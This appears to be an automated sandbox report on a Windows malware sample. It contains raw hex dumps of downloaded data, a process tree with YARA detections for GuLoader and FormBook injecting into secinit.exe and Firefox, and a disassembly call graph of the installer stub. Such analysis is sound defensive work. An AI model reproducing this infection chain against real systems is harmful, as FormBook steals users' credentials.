                                      2024-06-04 12:14:46 UTC1255INData Raw: 3e 52 a2 14 ca 1e cd bc e8 5f 5d cd f2 22 1e ba a1 1d 9f 19 21 09 46 1c 9d 4a 9d f1 ac a1 bd 31 d3 69 c7 ed f2 5c e7 db 60 6c df ee 3b 1a 7e 47 cb af 41 d3 22 4e f1 f3 6b 1e 2f 2b 99 7e eb 1c d5 03 bc 82 7d c3 ff 31 4c a5 7d b5 85 75 01 49 03 7e 8a 3f b6 0f f5 31 91 4a df 6e c1 ce 29 85 cc 0b a7 08 0d 8e f1 d3 ce 4f c2 17 3f cb 34 25 c1 69 ce c5 b2 a8 29 86 c3 db 22 7a 56 60 2a 21 65 a0 63 db a8 fc 2f e7 94 00 0b 90 77 98 d0 0e eb bf fa 4a cb 5e cb a7 12 fd 4e 4f f4 24 70 eb 6c 9d 07 cc 12 10 11 37 d5 85 f6 7d 4f 26 c9 90 8b 2a 06 cc 36 3d 62 51 85 14 e5 cd a8 4a 43 56 75 a5 8a d6 9f 4b eb 57 03 08 53 09 39 90 e1 4b 7b 05 5d 71 49 8a 92 b7 e2 bb ab 30 f1 b1 90 6d a4 3a 12 db 01 7a 50 21 4f 86 c2 58 a2 40 f1 77 a3 e6 71 2e 01 44 10 43 21 6a 7f 06 25 ad 50
                                      Data Ascii: >R_]"!FJ1i\`l;~GA"Nk/+~}1L}uI~?1Jn)O?4%i)"zV`*!ec/wJ^NO$pl7}O&*6=bQJCVuKWS9K{]qI0m:zP!OX@wq.DC!j%P
                                      2024-06-04 12:14:46 UTC1255INData Raw: 29 36 18 0d 7c c4 5b 29 ca 5a 82 64 a3 34 e4 76 02 df 31 e3 f0 ba 86 64 84 32 66 9c 3d 36 3f 30 06 68 75 bb fa da 98 cd 7f fa 4a 4b cb a1 62 43 d4 43 2d a6 fe 73 3f ed ff 75 14 f3 2e 67 6d 82 91 15 12 0a 30 22 ac b5 97 1b 38 61 c7 a7 0a 05 91 d2 25 50 c1 75 cf 20 8d ab 28 6f 43 e4 3e a8 29 86 46 17 22 7a 56 52 ea e3 2c d5 99 2d db fc 5a 12 1d b3 32 ed 67 56 bf 85 be b7 fc a4 c7 75 39 2c 6e 8f 00 7c f9 94 0c a2 e1 53 ac b2 48 66 af e9 b4 f7 df 4f af 30 f5 cb 13 3d b1 94 42 1e 6d e7 70 f9 53 0e 2b 84 2c af f4 3b 6b b3 02 b4 3a 03 3e 25 01 7c 71 6e 04 ee bf c2 32 10 8c 71 7b 7b bb f4 e9 0b 34 08 62 de 53 93 43 d9 d0 bb aa 7d 4f a9 5e 72 e2 1d 08 c2 13 e6 d7 6b 47 8d 49 c1 3e c0 0b 15 1f 9d 44 3a 40 b1 8b 3e 10 d7 12 33 5c ff 4f 14 31 9b cb 45 47 7a 58 fd 16
                                      Data Ascii: )6|[)Zd4v1d2f=6?0huJKbCC-s?u.gm0"8a%Pu (oC>)F"zVR,-Z2gVu9,n|SHfO0=BmpS+,;k:>%|qn2q{{4bSC}O^rkGI>D:@>3\O1EGzX
                                      2024-06-04 12:14:46 UTC1255INData Raw: aa 98 fb b1 f9 0d cd b6 c9 61 06 a5 d7 3e eb 7f af 78 f7 c9 d6 72 74 84 8b 82 3a e6 3a 54 8b 98 88 42 7b 68 f8 83 75 bc e0 17 7e eb 6e 0d 27 fe e3 8f d1 d8 c5 db 9f 73 ed fa 2b 12 a5 29 c9 82 cb ef 8d 54 3c 96 89 f2 bb 47 d7 79 84 d4 e5 2a 04 b5 c3 24 65 a0 2f 17 ae bd db e9 a7 fe 32 ed 1b 4e 0a f8 42 71 f4 d2 39 8a c6 2c 2b 32 b8 73 0d b7 47 c0 ae 1d d9 f3 9f a7 ef 0c 3f 0d 1e 18 4c 33 0f be 13 c4 49 03 cf 9b 81 19 b2 e4 ac 7b 23 db 8b f9 bd 4e 9e 6f 98 33 a6 06 ee 4b b9 e2 39 37 84 62 1f eb 5d 76 1e ca 79 97 7a 10 ba 5d db 1f a1 d9 fb 64 99 13 8c 33 50 c2 fd ed 7c a3 0a f0 03 4d fc e6 66 b2 2c 52 45 b7 76 d2 7f 9f ae ca 19 36 6b e2 90 1e 10 d7 12 b9 63 0b 0b 30 3b 79 b6 57 bb c2 db fd 9b d1 a1 23 89 c1 a7 8f 31 65 cf 95 99 2f 65 04 36 83 79 19 6d fd 1d
                                      Data Ascii: a>xrt::TB{hu~n's+)T<Gy*$e/2NBq9,+2sG?L3I{#No3K97b]vyz]d3P|Mf,REv6kc0;yW#1e/e6ym
                                      2024-06-04 12:14:46 UTC1255INData Raw: b5 49 21 e7 af f9 39 61 b8 2f c8 fa ff 75 d3 38 fa a4 4e 82 91 9e df be af f4 6b b6 fb ee 30 27 65 33 e1 03 18 ca ae 16 f5 f8 1c d7 72 54 e0 a8 45 31 66 69 c9 94 f0 2e e3 91 51 6e 7e aa a4 61 84 96 eb 52 5a 12 a7 c1 01 15 ec e8 b4 d3 c9 ae 7b 1c 06 fe 77 70 2c 97 4e f8 64 97 aa ce 25 12 bd 31 6d 66 ea 0c b4 36 35 fa 60 e0 7e 8d 80 0e 6a 78 5b 1e 4e 26 c6 55 23 cf cb 8c a2 87 b5 7d 4e 67 9d fe 11 5b 3c 85 54 34 3b 36 08 95 bf d2 87 37 7b 05 c2 e6 30 91 e1 02 b9 f7 95 d5 fb 47 6b 51 4c 72 91 9a c9 50 57 12 b3 6e f1 7d cb a2 a7 b8 4b 13 0a cc 7d 67 7d bc fa 90 ad d3 42 c3 d0 e5 4f 89 98 f2 3c 65 f8 31 12 87 d4 8e c7 88 6c 9b f9 47 f4 e9 dd 73 64 60 82 c7 2e ce 62 f7 2d df 56 9e f2 c2 bd 71 53 15 04 3e 9a 0d d3 d6 48 77 47 c5 e3 0f 4a 58 5d f1 78 dd 1a 1e 49
                                      Data Ascii: I!9a/u8Nk0'e3rTE1fi.Qn~aRZ{wp,Nd%1mf65`~jx[N&U#}Ng[<T4;67{0GkQLrPWn}K}g}BO<e1lGsd`.b-VqS>HwGJX]xI
                                      2024-06-04 12:14:46 UTC1255INData Raw: 17 84 82 a8 6c f9 f2 65 aa b8 c8 49 19 07 1a a5 64 f3 f3 ab 87 3f 4a 35 aa 11 99 5e f4 33 5f 9a ce 8c c0 95 26 54 85 6b de 41 4e b3 f2 26 a9 36 74 76 a8 b3 5a fc 60 23 7f 81 08 ce 7e 2f ab bd af 8b f7 5d b0 3a e8 f6 7d 96 11 13 98 20 41 3b 8a e5 1d 75 14 1f fb fd b1 2d 8d c6 c3 bb d2 1b 6c cd 87 5b d6 f8 07 22 bc 26 90 56 a0 4a 1f 9f b2 db 80 24 a3 3b fc 59 88 bb 4d 04 dd 05 af 1f eb e5 62 78 8a b0 e4 a2 57 70 d1 40 2e af e3 07 e9 f8 74 a3 b5 4a 31 01 33 7a bc 8a ca aa 01 2b 2f 45 2c 2e 10 49 51 8a e8 20 53 6a 5b 67 fd 45 7c 19 07 e9 80 9b 5e 02 bf 70 27 87 00 0b 12 8c 80 8b 31 2d 97 08 42 e2 1a 86 8f 5b 41 6b 61 5d 4f 54 21 7f f1 18 ce 9e e1 e9 72 ae 71 04 3b 05 07 03 fb f3 02 73 89 df cd d3 f9 86 40 ba cf 19 ef ee b9 8b 6e 05 b9 22 55 9d 0f 9c 62 10 b7
                                      Data Ascii: leId?J5^3_&TkAN&6tvZ`#~/]:} A;u-l["&VJ$;YMbxWp@.tJ13z+/E,.IQ Sj[gE|^p'1-B[Aka]OT!rq;s@n"Ub
                                      2024-06-04 12:14:46 UTC1255INData Raw: 04 80 3a a5 0e 9c 7f b4 a9 f6 2e 58 54 24 c1 a3 3f 11 a6 4b bc 70 46 29 27 28 06 fe f9 5e cf 78 c5 a9 6b 4f 79 79 8e 31 8c f9 ef 07 08 a0 13 1e 6d 1d a3 a4 7c 0f 11 f4 06 f3 4e 6f 4e ea 1d 76 66 4f 89 11 f6 75 95 b1 8b 1b 42 f1 5a c6 c7 27 2b a3 47 de e9 ca 1e eb f8 cd e0 e3 c5 85 f7 4c 02 ea de a4 91 88 6a e8 47 c8 6b 24 86 d9 43 4e ce c0 4e 25 bd 86 c9 b2 1c 55 ea b1 79 54 0e ea ee 45 aa 75 1e 6c da 2a 79 8f e1 45 4c 54 24 bb e6 6b 83 40 b6 db d8 7a 52 0c 56 d3 22 f4 c5 04 01 3a 5c 77 9f 04 66 b3 74 89 89 17 36 af a2 09 0f ec fd 9f 02 fb 3c 49 53 a4 80 18 37 cc a6 50 e8 37 3d fb e1 d8 96 5a c2 b4 c0 e8 01 97 e5 bd dc 02 44 3a a1 f2 2d 2e 88 a2 24 0c 60 0b c6 a7 fa 65 b5 03 c9 88 7e a6 70 6a 76 27 45 41 e0 a6 bb 5b 71 17 bb d2 81 8a c3 ab 3e d3 dc a2 7a
                                      Data Ascii: :.XT$?KpF)'(^xkOyy1m|NoNvfOuBZ'+GLjGk$CNN%UyTEul*yELT$k@zRV":\wft6<IS7P7=ZD:-.$`e~pjv'EA[q>z
                                      2024-06-04 12:14:46 UTC1255INData Raw: f2 7a 0a 79 89 81 c3 fc 76 4e 65 e5 38 07 93 70 2d 77 f4 f9 68 5f 39 4d ee a8 21 14 62 20 b5 35 a4 7f d2 26 29 df 25 f3 43 63 70 6d cd 88 3b 00 fc 21 f8 cb af f5 79 c8 8d 03 b3 69 6c b2 2a ee 49 a7 5a fd 40 2f 0d da 86 34 db 33 13 2f da 62 b0 bb c7 61 65 7c 70 7d 66 ad 07 cf e2 42 57 c9 13 53 d7 59 3a 1f 06 5a 90 4c f8 33 bf 60 df 60 c4 dd 47 ef 13 85 53 12 7c 22 ca ac e6 1f d5 36 eb e1 c7 5a 9e 2b b5 d1 d2 3a 61 e9 7d 61 fa 35 3e aa 0f 53 9c 10 dd e6 2b 9c 48 bf 63 44 77 d1 f0 97 8c 94 81 16 4b 26 10 ae fa c0 8f 38 7f eb e4 bc 97 07 94 f4 9f 8c 03 40 16 88 b3 eb 56 09 c6 e8 12 19 d0 7f b3 c3 2e 94 91 ff 36 b5 8a cb 0f 0f 00 e3 a5 7e 46 f4 e9 0a 5c 5c 70 2a 25 93 45 fb 40 6f e8 e0 fe 7e 19 d6 04 66 42 7f 87 01 b8 2c 52 d8 50 6b e7 c3 ab b7 7c dc 87 95 6e
                                      Data Ascii: zyvNe8p-wh_9M!b 5&)%Ccpm;!yil*IZ@/43/bae|p}fBWSY:ZL3``GS|"6Z+:a}a5>S+HcDwK&8@V.6~F\\p*%E@o~fB,RPk|n


                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Target ID:5
                                      Start time:08:14:14
                                      Start date:04/06/2024
                                      Path:C:\Users\user\Desktop\fJuwM4Bwi7.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\fJuwM4Bwi7.exe"
                                      Imagebase:0x400000
                                      File size:600'280 bytes
                                      MD5 hash:0CB5485C0840CF976767BC45FB0B45D4
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.79055979562.0000000004FBC000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:8
                                      Start time:08:14:33
                                      Start date:04/06/2024
                                      Path:C:\Users\user\Desktop\fJuwM4Bwi7.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\fJuwM4Bwi7.exe"
                                      Imagebase:0x7ff681ba0000
                                      File size:600'280 bytes
                                      MD5 hash:0CB5485C0840CF976767BC45FB0B45D4
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.79178393595.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.79178393595.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.79195519059.0000000034A30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.79195519059.0000000034A30000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                      Reputation:low
                                      Has exited:true

                                      General

                                      Target ID:9
                                      Start time:08:14:50
                                      Start date:04/06/2024
                                      Path:C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe"
                                      Imagebase:0xa20000
                                      File size:140'800 bytes
                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.83833394581.0000000004920000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.83833394581.0000000004920000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                      Reputation:high
                                      Has exited:false

                                      General

                                      Target ID:10
                                      Start time:08:14:52
                                      Start date:04/06/2024
                                      Path:C:\Windows\SysWOW64\secinit.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\SysWOW64\secinit.exe"
                                      Imagebase:0x340000
                                      File size:9'728 bytes
                                      MD5 hash:3B4B8DB765C75B8024A208AE6915223C
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.83833661006.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.83833661006.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.83831074865.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.83831074865.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.83833772004.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.83833772004.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                      Reputation:moderate
                                      Has exited:false

                                      General

                                      Target ID:11
                                      Start time:08:15:05
                                      Start date:04/06/2024
                                      Path:C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe"
                                      Imagebase:0xa20000
                                      File size:140'800 bytes
                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.83832835974.0000000001450000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.83832835974.0000000001450000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                      Reputation:high
                                      Has exited:false

                                      General

                                      Target ID:12
                                      Start time:08:15:17
                                      Start date:04/06/2024
                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                      Imagebase:0x7ff738760000
                                      File size:687'008 bytes
                                      MD5 hash:D1CC73370B9EF7D74E6D9FD9248CD687
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate
                                      Has exited:true

                                      Disassembly

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:20.7%
                                        Dynamic/Decrypted Code Coverage:14.3%
                                        Signature Coverage:19.7%
                                        Total number of Nodes:1473
                                        Total number of Limit Nodes:42
                                        execution_graph 3866 4022c0 3867 4022f0 3866->3867 3868 4022c5 3866->3868 3878 4029fd 3867->3878 3895 402b07 3868->3895 3871 4022cc 3873 4022d6 3871->3873 3877 40230d 3871->3877 3872 4022f7 3884 402a3d RegOpenKeyExA 3872->3884 3874 4029fd 18 API calls 3873->3874 3876 4022dd RegDeleteValueA RegCloseKey 3874->3876 3876->3877 3879 402a09 3878->3879 3899 405d58 3879->3899 3882 402a36 3882->3872 3885 402ad1 3884->3885 3892 402a68 3884->3892 3885->3877 3886 402a8e RegEnumKeyA 3887 402aa0 RegCloseKey 3886->3887 3886->3892 3938 406061 GetModuleHandleA 3887->3938 3888 402ac5 RegCloseKey 3894 402ab4 3888->3894 3890 402a3d 3 API calls 3890->3892 3892->3886 3892->3887 3892->3888 3892->3890 3893 402ae0 RegDeleteKeyA 3893->3894 3894->3885 3896 4029fd 18 API calls 3895->3896 3897 402b20 3896->3897 3898 402b2e RegOpenKeyExA 3897->3898 3898->3871 3915 405d65 3899->3915 3900 405f88 3901 402a2a 3900->3901 3933 405d36 lstrcpynA 3900->3933 3901->3882 3917 405fa1 3901->3917 3903 405e06 GetVersion 3903->3915 3904 405f5f lstrlenA 3904->3915 3907 405d58 10 API calls 3907->3904 3909 405e7e GetSystemDirectoryA 3909->3915 3910 405e91 GetWindowsDirectoryA 3910->3915 3911 405fa1 5 API calls 3911->3915 3912 405d58 10 API calls 3912->3915 3913 405f08 lstrcatA 3913->3915 3914 405ec5 SHGetSpecialFolderLocation 3914->3915 3916 405edd SHGetPathFromIDListA CoTaskMemFree 3914->3916 3915->3900 3915->3903 3915->3904 3915->3907 3915->3909 3915->3910 3915->3911 3915->3912 3915->3913 3915->3914 3926 405c1d RegOpenKeyExA 3915->3926 3931 405c94 wsprintfA 3915->3931 3932 405d36 lstrcpynA 3915->3932 3916->3915 3918 405fad 3917->3918 3920 40600a CharNextA 3918->3920 3922 406015 3918->3922 3924 405ff8 CharNextA 3918->3924 3925 406005 CharNextA 3918->3925 3934 4057f1 3918->3934 3919 406019 CharPrevA 3919->3922 3920->3918 3920->3922 3922->3919 3923 406034 3922->3923 3923->3882 3924->3918 3925->3920 3927 405c50 RegQueryValueExA 3926->3927 3928 405c8e 3926->3928 3929 405c71 RegCloseKey 3927->3929 3928->3915 3929->3928 3931->3915 3932->3915 3933->3901 3935 4057f7 3934->3935 3936 40580a 3935->3936 3937 4057fd CharNextA 3935->3937 3936->3918 3937->3935 3939 406088 GetProcAddress 3938->3939 3940 40607d LoadLibraryA 3938->3940 3941 402ab0 3939->3941 3940->3939 3940->3941 3941->3893 3941->3894 4916 10001000 4919 1000101b 4916->4919 4926 100014bb 4919->4926 4921 10001020 4922 10001024 4921->4922 4923 10001027 GlobalAlloc 4921->4923 4924 100014e2 3 API calls 4922->4924 4923->4922 4925 10001019 4924->4925 4928 100014c1 4926->4928 4927 100014c7 4927->4921 4928->4927 4929 100014d3 GlobalFree 4928->4929 4929->4921 4930 4019c0 4931 4029fd 18 API calls 4930->4931 4932 4019c7 4931->4932 4933 4029fd 18 API calls 4932->4933 4934 4019d0 4933->4934 4935 4019d7 lstrcmpiA 4934->4935 4936 4019e9 lstrcmpA 4934->4936 4937 4019dd 4935->4937 4936->4937 4938 402b42 4939 402b51 SetTimer 4938->4939 4940 402b6a 4938->4940 4939->4940 4941 402bb8 4940->4941 4942 402bbe MulDiv 4940->4942 4943 402b78 wsprintfA SetWindowTextA SetDlgItemTextA 4942->4943 4943->4941 4945 402645 4946 4029fd 18 API calls 4945->4946 4947 40264c FindFirstFileA 4946->4947 4948 40266f 4947->4948 4949 40265f 4947->4949 4953 405c94 wsprintfA 4948->4953 4951 402676 4954 405d36 lstrcpynA 4951->4954 4953->4951 4954->4949 4955 403745 4956 403750 4955->4956 4957 403754 4956->4957 4958 403757 GlobalAlloc 4956->4958 4958->4957 3942 4023c8 3943 402b07 19 API calls 3942->3943 3944 4023d2 3943->3944 3945 4029fd 18 API calls 3944->3945 3946 4023db 3945->3946 3947 4023e5 RegQueryValueExA 3946->3947 3950 402663 3946->3950 3948 40240b RegCloseKey 3947->3948 3949 402405 3947->3949 3948->3950 3949->3948 3953 405c94 wsprintfA 3949->3953 3953->3948 4146 4014ca 4147 40501f 25 API calls 4146->4147 4148 4014d1 4147->4148 4973 401ccc GetDlgItem GetClientRect 4974 4029fd 18 API calls 4973->4974 4975 401cfc LoadImageA SendMessageA 4974->4975 4976 402892 4975->4976 4977 401d1a DeleteObject 4975->4977 4977->4976 4978 1000180d 4979 10001830 4978->4979 4980 10001860 GlobalFree 4979->4980 4981 10001872 4979->4981 4980->4981 4982 10001266 2 API calls 4981->4982 4983 100019e3 GlobalFree GlobalFree 4982->4983 4188 1000270f 4189 1000275f 4188->4189 4190 1000271f VirtualProtect 4188->4190 4190->4189 4991 4024d1 4992 4024d6 4991->4992 4993 4024e7 4991->4993 4994 4029e0 18 API calls 4992->4994 4995 4029fd 18 API calls 4993->4995 4997 4024dd 4994->4997 4996 4024ee lstrlenA 4995->4996 4996->4997 4998 40250d WriteFile 4997->4998 4999 402663 4997->4999 4998->4999 5000 4025d3 5001 4025da 5000->5001 5003 40283f 5000->5003 5002 4029e0 18 API calls 5001->5002 5004 4025e5 5002->5004 5005 4025ec SetFilePointer 5004->5005 5005->5003 5006 4025fc 5005->5006 5008 405c94 wsprintfA 5006->5008 5008->5003 4216 4014d6 4217 4029e0 18 API calls 4216->4217 4218 4014dc Sleep 4217->4218 4220 402892 4218->4220 4642 401dd8 4643 4029fd 18 API calls 4642->4643 4644 401dde 4643->4644 4645 4029fd 18 API calls 4644->4645 4646 401de7 4645->4646 4647 4029fd 18 API calls 4646->4647 4648 401df0 4647->4648 4649 4029fd 18 API calls 4648->4649 4650 401df9 4649->4650 4651 401423 25 API calls 4650->4651 4652 401e00 ShellExecuteA 4651->4652 4653 401e2d 4652->4653 5009 1000161a 5010 10001649 5009->5010 5011 10001a5d 18 API calls 5010->5011 5012 10001650 5011->5012 5013 10001663 5012->5013 5014 10001657 5012->5014 5016 1000168a 5013->5016 5017 1000166d 5013->5017 5015 10001266 2 API calls 5014->5015 5018 10001661 5015->5018 5020 10001690 5016->5020 5021 100016b4 5016->5021 5019 100014e2 3 API calls 5017->5019 5023 10001672 5019->5023 5024 10001559 3 API calls 5020->5024 5022 100014e2 3 API calls 5021->5022 5022->5018 5025 10001559 3 API calls 5023->5025 5026 10001695 5024->5026 5028 10001678 5025->5028 5027 10001266 2 API calls 5026->5027 5029 1000169b GlobalFree 5027->5029 5030 10001266 2 API calls 5028->5030 5029->5018 5031 100016af GlobalFree 5029->5031 5032 1000167e GlobalFree 5030->5032 5031->5018 5032->5018 4786 40155b 4787 401577 ShowWindow 4786->4787 4788 40157e 4786->4788 4787->4788 4789 402892 4788->4789 4790 40158c ShowWindow 4788->4790 4790->4789 5040 401edc 5041 4029fd 18 API calls 5040->5041 5042 401ee3 GetFileVersionInfoSizeA 5041->5042 5043 401f06 GlobalAlloc 5042->5043 5045 401f5c 5042->5045 5044 401f1a GetFileVersionInfoA 5043->5044 5043->5045 5044->5045 5046 401f2b VerQueryValueA 5044->5046 5046->5045 5047 401f44 5046->5047 5051 405c94 wsprintfA 5047->5051 5049 401f50 5052 405c94 wsprintfA 5049->5052 5051->5049 5052->5045 4818 40515d 4819 405308 4818->4819 4820 40517f GetDlgItem GetDlgItem GetDlgItem 4818->4820 4822 405310 GetDlgItem CreateThread CloseHandle 4819->4822 4823 405338 4819->4823 4864 404021 SendMessageA 4820->4864 4822->4823 4867 4050f1 5 API calls 4822->4867 4825 405366 4823->4825 4828 405387 4823->4828 4829 40534e ShowWindow ShowWindow 4823->4829 4824 4051ef 4833 4051f6 GetClientRect GetSystemMetrics SendMessageA SendMessageA 4824->4833 4826 4053c1 4825->4826 4827 40536e 4825->4827 4826->4828 4840 4053ce SendMessageA 4826->4840 4830 405376 4827->4830 4831 40539a ShowWindow 4827->4831 4832 404053 8 API calls 4828->4832 4866 404021 SendMessageA 4829->4866 4835 403fc5 SendMessageA 4830->4835 4836 4053ba 4831->4836 4837 4053ac 4831->4837 4846 405393 4832->4846 4838 405264 4833->4838 4839 405248 SendMessageA SendMessageA 4833->4839 4835->4828 4842 403fc5 SendMessageA 4836->4842 4841 40501f 25 API calls 4837->4841 4843 405277 4838->4843 4844 405269 SendMessageA 4838->4844 4839->4838 4845 4053e7 CreatePopupMenu 4840->4845 4840->4846 4841->4836 4842->4826 4847 403fec 19 API calls 4843->4847 4844->4843 4848 405d58 18 API calls 4845->4848 4850 405287 4847->4850 4849 4053f7 AppendMenuA 4848->4849 4851 405415 GetWindowRect 4849->4851 4852 405428 TrackPopupMenu 4849->4852 4853 405290 ShowWindow 4850->4853 4854 4052c4 GetDlgItem SendMessageA 4850->4854 4851->4852 4852->4846 4855 405444 4852->4855 4856 4052b3 4853->4856 4857 4052a6 ShowWindow 4853->4857 4854->4846 4858 4052eb SendMessageA SendMessageA 4854->4858 4859 405463 SendMessageA 4855->4859 4865 404021 SendMessageA 4856->4865 4857->4856 4858->4846 4859->4859 4860 405480 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4859->4860 4862 4054a2 SendMessageA 4860->4862 4862->4862 4863 4054c4 GlobalUnlock SetClipboardData CloseClipboard 4862->4863 4863->4846 4864->4824 4865->4854 4866->4825 5058 4018e3 5059 40191a 5058->5059 5060 4029fd 18 API calls 5059->5060 5061 40191f 5060->5061 5062 4055f6 71 API calls 5061->5062 5063 401928 5062->5063 5064 4043e3 5065 4043f3 5064->5065 5066 404419 5064->5066 5067 403fec 19 API calls 5065->5067 5068 404053 8 API calls 5066->5068 5069 404400 SetDlgItemTextA 5067->5069 5070 404425 5068->5070 5069->5066 5071 4018e6 5072 4029fd 18 API calls 5071->5072 5073 4018ed 5072->5073 5074 40554a MessageBoxIndirectA 5073->5074 5075 4018f6 5074->5075 3954 401f68 3955 401f7a 3954->3955 3956 402028 3954->3956 3957 4029fd 18 API calls 3955->3957 3959 401423 25 API calls 3956->3959 3958 401f81 3957->3958 3960 4029fd 18 API calls 3958->3960 3964 402181 3959->3964 3961 401f8a 3960->3961 3962 401f92 GetModuleHandleA 3961->3962 3963 401f9f LoadLibraryExA 3961->3963 3962->3963 3965 401faf GetProcAddress 3962->3965 3963->3956 3963->3965 3966 401ffb 3965->3966 3967 401fbe 3965->3967 4020 40501f 3966->4020 3969 401fc6 3967->3969 3970 401fdd 3967->3970 4017 401423 3969->4017 3975 100016bd 3970->3975 3972 401fce 3972->3964 3973 40201c FreeLibrary 3972->3973 3973->3964 3976 100016ed 3975->3976 4031 10001a5d 3976->4031 3978 100016f4 3979 1000180a 3978->3979 3980 10001705 3978->3980 3981 1000170c 3978->3981 3979->3972 4080 100021b0 3980->4080 4063 100021fa 3981->4063 3986 10001770 3992 100017b2 3986->3992 3993 10001776 3986->3993 3987 10001752 4093 100023da 3987->4093 3988 10001722 3991 10001728 3988->3991 3997 10001733 3988->3997 3989 1000173b 4004 10001731 3989->4004 4090 10002aa7 3989->4090 3991->4004 4074 100027ec 3991->4074 3995 100023da 11 API calls 3992->3995 3999 10001559 3 API calls 3993->3999 4005 100017a4 3995->4005 3996 10001758 4104 10001559 3996->4104 4084 1000258d 3997->4084 4002 1000178c 3999->4002 4003 100023da 11 API calls 4002->4003 4003->4005 4004->3986 4004->3987 4008 100017f9 4005->4008 4115 100023a0 4005->4115 4007 10001739 4007->4004 4008->3979 4010 10001803 GlobalFree 4008->4010 4010->3979 4014 100017e5 4014->4008 4119 100014e2 wsprintfA 4014->4119 4015 100017de FreeLibrary 4015->4014 4018 40501f 25 API calls 4017->4018 4019 401431 4018->4019 4019->3972 4021 4050dd 4020->4021 4022 40503a 4020->4022 4021->3972 4023 405057 lstrlenA 4022->4023 4024 405d58 18 API calls 4022->4024 4025 405080 4023->4025 4026 405065 lstrlenA 4023->4026 4024->4023 4028 405093 4025->4028 4029 405086 SetWindowTextA 4025->4029 4026->4021 4027 405077 lstrcatA 4026->4027 4027->4025 4028->4021 4030 405099 SendMessageA SendMessageA SendMessageA 4028->4030 4029->4028 4030->4021 4122 10001215 GlobalAlloc 4031->4122 4033 10001a81 4123 10001215 GlobalAlloc 4033->4123 4035 10001cbb GlobalFree GlobalFree GlobalFree 4036 10001cd8 4035->4036 4051 10001d22 4035->4051 4037 1000201a 4036->4037 4045 10001ced 4036->4045 4036->4051 4039 1000203c GetModuleHandleA 4037->4039 4037->4051 4038 10001b60 GlobalAlloc 4058 10001a8c 4038->4058 4040 10002062 4039->4040 4041 1000204d LoadLibraryA 4039->4041 4130 100015a4 GetProcAddress 4040->4130 4041->4040 